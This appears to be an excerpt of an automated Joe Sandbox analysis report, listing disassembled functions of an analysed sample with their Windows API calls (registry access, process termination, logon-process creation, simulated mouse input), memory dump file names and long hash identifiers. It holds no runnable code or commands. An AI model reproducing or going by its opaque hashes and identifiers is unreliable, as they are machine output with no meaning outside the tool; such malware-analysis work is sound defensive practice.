                                                    • Instruction ID: cbc9d32edc730fc343c067c9721f5382f85c6f65d498ac35607bd0e8e1b042c8
                                                    • Opcode Fuzzy Hash: ac0f19f43787379e074130e7828b8be381768330a8e836083ea518020a2299b0
                                                    • Instruction Fuzzy Hash: D8E01278682201FFEB00DB61FC6CF613AABBB20B42F142124F041E19A0CFB446449B84
                                                    Function 0066675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 3253778849-0
                                                    • Opcode ID: 66ad4186d3204babbd3c42a1bb89c22eaa972b443cfecd9d02f8356ef0ff4d95
                                                    • Instruction ID: 6d5d0dcd42caea2f16aa29d720fcae19dc27deee12637f23f745c24fca90d6af
                                                    • Opcode Fuzzy Hash: 66ad4186d3204babbd3c42a1bb89c22eaa972b443cfecd9d02f8356ef0ff4d95
                                                    • Instruction Fuzzy Hash: E9619B3054469AABCF15EF64D882EFF37A6AF05308F04461DF85A5B2D2DB30AC41CBA4
                                                    Function 0068046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 006810A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00680038,?,?), ref: 006810BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680548
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00680588
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006805AB
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006805D4
                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00680617
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00680624
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                    • String ID:
                                                    • API String ID: 4046560759-0
                                                    • Opcode ID: ef7ab207638ac6e76624ffcc149979669cbf0f0b6d03702baf5a564d575608f5
                                                    • Instruction ID: b69b3ea1be959f40a646fc010fd68978a3e010973f080868d08626057a759d84
                                                    • Opcode Fuzzy Hash: ef7ab207638ac6e76624ffcc149979669cbf0f0b6d03702baf5a564d575608f5
                                                    • Instruction Fuzzy Hash: 83516A31208240AFDB54EF14C885E6BBBEAFF89314F044A1DF545872A2DB31E949CB56
                                                    Function 00685A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 00685A82
                                                    • GetMenuItemCount.USER32(00000000), ref: 00685AB9
                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00685AE1
                                                    • GetMenuItemID.USER32(?,?), ref: 00685B50
                                                    • GetSubMenu.USER32(?,?), ref: 00685B5E
                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00685BAF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountMessagePostString
                                                    • String ID:
                                                    • API String ID: 650687236-0
                                                    • Opcode ID: 8c80c4f66f3c214af8c8547817489b52b7ad0daca3c90d416055446985b31a23
                                                    • Instruction ID: 1f0f90e97a680eae1b0a20d02d43d5d28cffaa5b74532a87db5afb2b86c64168
                                                    • Opcode Fuzzy Hash: 8c80c4f66f3c214af8c8547817489b52b7ad0daca3c90d416055446985b31a23
                                                    • Instruction Fuzzy Hash: 56518F31A00625EFCF15EFA4C895AEEB7B6EF58310F104569E812BB351CB70AE41CB95
                                                    Function 0065F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0065F3F7
                                                    • VariantClear.OLEAUT32(00000013), ref: 0065F469
                                                    • VariantClear.OLEAUT32(00000000), ref: 0065F4C4
                                                    • _memmove.LIBCMT ref: 0065F4EE
                                                    • VariantClear.OLEAUT32(?), ref: 0065F53B
                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0065F569
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                    • String ID:
                                                    • API String ID: 1101466143-0
                                                    • Opcode ID: 6eb77c058b3cad8c34a7c9f9709f5f8530f42dadb6f894d780cf5b07d8a7ade4
                                                    • Instruction ID: e82363c52f2c0173b02a23bbe82552c34ae4db1678ba87f6f1ee61087c6fe645
                                                    • Opcode Fuzzy Hash: 6eb77c058b3cad8c34a7c9f9709f5f8530f42dadb6f894d780cf5b07d8a7ade4
                                                    • Instruction Fuzzy Hash: C3515AB5A00209AFCB10CF58D884AAAB7F9FF4C354F15856AED59DB341E730E915CBA0
                                                    Function 006626F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00662747
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00662792
                                                    • IsMenu.USER32(00000000), ref: 006627B2
                                                    • CreatePopupMenu.USER32 ref: 006627E6
                                                    • GetMenuItemCount.USER32(000000FF), ref: 00662844
                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00662875
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                    • String ID:
                                                    • API String ID: 3311875123-0
                                                    • Opcode ID: f66ea1407e439be467b96a068f5cde078f9229ccaec8603921459b9ded2a8678
                                                    • Instruction ID: 47bb088c112711cc47c554ce4982757610ba8f91a1d96d7b901dfba731e0607d
                                                    • Opcode Fuzzy Hash: f66ea1407e439be467b96a068f5cde078f9229ccaec8603921459b9ded2a8678
                                                    • Instruction Fuzzy Hash: F3518E70A01B07EBDF24CF69DCA8AEEBBF6AF44314F10426DE8119B291D7709949CB51
                                                    Function 00601765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0060179A
                                                    • GetWindowRect.USER32(?,?), ref: 006017FE
                                                    • ScreenToClient.USER32(?,?), ref: 0060181B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0060182C
                                                    • EndPaint.USER32(?,?), ref: 00601876
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                    • String ID:
                                                    • API String ID: 1827037458-0
                                                    • Opcode ID: 0e64298c76f6a6258e4472e608d98c054ab7650792cdf836abd5fe03f2292c43
                                                    • Instruction ID: 68e48d551466f1c1f50c496909524be5823119cbdf7dbe44647ff311e61af89a
                                                    • Opcode Fuzzy Hash: 0e64298c76f6a6258e4472e608d98c054ab7650792cdf836abd5fe03f2292c43
                                                    • Instruction Fuzzy Hash: 21418B70604301AFD710DF24CC84FBB7BEAEB4A724F144629FAA5CA2E1C7319945DB61
                                                    Function 0068B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(006C67B0,00000000,01315678,?,?,006C67B0,?,0068B862,?,?), ref: 0068B9CC
                                                    • EnableWindow.USER32(00000000,00000000), ref: 0068B9F0
                                                    • ShowWindow.USER32(006C67B0,00000000,01315678,?,?,006C67B0,?,0068B862,?,?), ref: 0068BA50
                                                    • ShowWindow.USER32(00000000,00000004,?,0068B862,?,?), ref: 0068BA62
                                                    • EnableWindow.USER32(00000000,00000001), ref: 0068BA86
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0068BAA9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 77bb4a715b0ca8b315ae7a883a0b2f78e46918447bdee76da76db23c798009f0
                                                    • Instruction ID: fb5cd180975ddc699420e84787b3eb04b951f1abc4e7aa08302bae92adbdaf42
                                                    • Opcode Fuzzy Hash: 77bb4a715b0ca8b315ae7a883a0b2f78e46918447bdee76da76db23c798009f0
                                                    • Instruction Fuzzy Hash: FA414C30640241AFDB26DF24C499BD57BE2FB06310F1853A9FA588F3A2C771A846CB51
                                                    Function 006773B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00675134,?,?,00000000,00000001), ref: 006773BF
                                                      • Part of subcall function 00673C94: GetWindowRect.USER32(?,?), ref: 00673CA7
                                                    • GetDesktopWindow.USER32 ref: 006773E9
                                                    • GetWindowRect.USER32(00000000), ref: 006773F0
                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00677422
                                                      • Part of subcall function 006654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0066555E
                                                    • GetCursorPos.USER32(?), ref: 0067744E
                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006774AC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                    • String ID:
                                                    • API String ID: 4137160315-0
                                                    • Opcode ID: e01acb2b5a3156fe5b2b8a085574bf67488fb601dfc40366dba211808a475564
                                                    • Instruction ID: 4f1082fa7dda4450a557a36248935bd91cc48d4914b9c9670bb61a1fa23ef1d6
                                                    • Opcode Fuzzy Hash: e01acb2b5a3156fe5b2b8a085574bf67488fb601dfc40366dba211808a475564
                                                    • Instruction Fuzzy Hash: 2B31E472508305ABD720DF14D849F9BBBEAFF88314F004A19F589A7291DB30E908CB92
                                                    Function 00658D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006585F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00658608
                                                      • Part of subcall function 006585F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00658612
                                                      • Part of subcall function 006585F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00658621
                                                      • Part of subcall function 006585F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00658628
                                                      • Part of subcall function 006585F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0065863E
                                                    • GetLengthSid.ADVAPI32(?,00000000,00658977), ref: 00658DAC
                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00658DB8
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00658DBF
                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00658DD8
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00658977), ref: 00658DEC
                                                    • HeapFree.KERNEL32(00000000), ref: 00658DF3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                    • String ID:
                                                    • API String ID: 3008561057-0
                                                    • Opcode ID: 4daa461a8da49a331d87b414b3575986a8afde3c0ecc3735ce2e9be7d1e74f7b
                                                    • Instruction ID: 11e9b0ce2707bca7f2a0eeba89d1d2850684386b299ab29efd281ce865794f91
                                                    • Opcode Fuzzy Hash: 4daa461a8da49a331d87b414b3575986a8afde3c0ecc3735ce2e9be7d1e74f7b
                                                    • Instruction Fuzzy Hash: A011AC71500605FFDB109FA4CC49BEEBBBAEF55316F104229E885A7250DB329908CB60
                                                    Function 00658AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00658B2A
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00658B31
                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00658B40
                                                    • CloseHandle.KERNEL32(00000004), ref: 00658B4B
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00658B7A
                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00658B8E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 1413079979-0
                                                    • Opcode ID: 021ad615f3a458e190358c2ae3c50dc7c214d5cb09a03ea44995aed6680dc596
                                                    • Instruction ID: d78f84f3a164cb3c94d5b00c0733b12821f224444532c3a4ec95c1f42b272281
                                                    • Opcode Fuzzy Hash: 021ad615f3a458e190358c2ae3c50dc7c214d5cb09a03ea44995aed6680dc596
                                                    • Instruction Fuzzy Hash: 091159B2600209BFDF018FA4ED49FDA7BAEEF08305F145164FE04A2160C7768E64AB60
                                                    Function 0068C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0060134D
                                                      • Part of subcall function 006012F3: SelectObject.GDI32(?,00000000), ref: 0060135C
                                                      • Part of subcall function 006012F3: BeginPath.GDI32(?), ref: 00601373
                                                      • Part of subcall function 006012F3: SelectObject.GDI32(?,00000000), ref: 0060139C
                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0068C1C4
                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0068C1D8
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0068C1E6
                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0068C1F6
                                                    • EndPath.GDI32(00000000), ref: 0068C206
                                                    • StrokePath.GDI32(00000000), ref: 0068C216
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                    • String ID:
                                                    • API String ID: 43455801-0
                                                    • Opcode ID: 609210bebda2f48795ed04ffb51f6a3f640901e9c9279bc5baa43d07fde4d96d
                                                    • Instruction ID: afeb01cdc3472f63e2d75d6fd4a49b797e806c5fad828cf560a22e7ff3d57ec2
                                                    • Opcode Fuzzy Hash: 609210bebda2f48795ed04ffb51f6a3f640901e9c9279bc5baa43d07fde4d96d
                                                    • Instruction Fuzzy Hash: 26111E7640010CBFDF119F94DC48EEA7FAEEB04354F048125B9188A1A1C7719E55DBA0
                                                    Function 006203A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006203D3
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 006203DB
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006203E6
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006203F1
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 006203F9
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00620401
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: c8ce5e51924d6c0b2d98f57fdacc3e3a7c583f7c2996e29096ff11bfe3098502
                                                    • Instruction ID: 52b73b378a183050eee603c40363860a249c3615448359fcb5683e8554e6589a
                                                    • Opcode Fuzzy Hash: c8ce5e51924d6c0b2d98f57fdacc3e3a7c583f7c2996e29096ff11bfe3098502
                                                    • Instruction Fuzzy Hash: 02016CB09417597DE3008F5A8C85B52FFA8FF19354F00421BA15C87941C7F5A864CBE5
                                                    Function 0066568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0066569B
                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006656B1
                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 006656C0
                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006656CF
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006656D9
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006656E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: e4ba6bdfb3aaa060c78c58e0fc4e4066b1ed364101e41a26d02267fc2ac9ecd4
                                                    • Instruction ID: f25b1162e98b2015251e12285870fc6feb9e212c046307c67f8e5c8c4125b781
                                                    • Opcode Fuzzy Hash: e4ba6bdfb3aaa060c78c58e0fc4e4066b1ed364101e41a26d02267fc2ac9ecd4
                                                    • Instruction Fuzzy Hash: 23F01D32241158BBE7215BA2DC0EEEB7A7DEFCAB11F000369FA05D1060EAA11A5187B5
                                                    Function 006674D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 006674E5
                                                    • EnterCriticalSection.KERNEL32(?,?,00611044,?,?), ref: 006674F6
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00611044,?,?), ref: 00667503
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00611044,?,?), ref: 00667510
                                                      • Part of subcall function 00666ED7: CloseHandle.KERNEL32(00000000,?,0066751D,?,00611044,?,?), ref: 00666EE1
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00667523
                                                    • LeaveCriticalSection.KERNEL32(?,?,00611044,?,?), ref: 0066752A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
